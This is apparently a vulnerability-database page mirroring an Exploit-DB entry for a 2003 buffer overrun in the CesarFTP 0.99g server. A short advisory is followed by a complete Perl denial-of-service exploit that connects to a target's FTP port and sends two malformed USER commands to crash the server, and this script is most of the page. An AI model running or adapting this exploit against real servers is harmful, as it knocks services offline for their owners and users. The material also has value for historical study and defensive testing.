CesarFTP 0.99 g - Remote 'Username' Buffer Overrun

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053796 漏洞类型
发布时间 2003-03-30 更新时间 2003-03-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22788
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7946/info

A buffer overrun vulnerability has been reported for CesarFTP. The problem is said to occur when multiple 'USER' commands are processed within a single session. When the issue is triggered, it may be possible to overwrite sensitive locations in memory. Although unconfirmed, it may be possible to exploit this issue to execute arbitrary code on a target system. 

#!/usr/local/bin/perl
# DOS remote exploit for CesarFtp 0.99g
#It will try to crash CesarFtp Server remotely:)


use Socket;

$ARGC=@ARGV;
if ($ARGC !=1) {
        print "Usage: $0 <host>\n";
        exit;
}


$string="x" x $length;

my($remote,$port,$iaddr,$paddr,$proto,$line);
$remote=$ARGV[0];
$port = "21";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
$login1="user /f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
        f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
        f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
        f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
        f00/\n";

#---------------------------------------------------
print "Sending evil request 1...\n";
print ($login1);
send(SOCK,$login1, 0) or die "Cannot send query: $!";
$login1="user !@#$%^&*()_\n";
print "Sending evil request 2...\n";
print ($login1);
send(SOCK,$login1, 0) or die "Cannot send query: $!";
print "Now if you are lucky the server will crash:)\n"

#End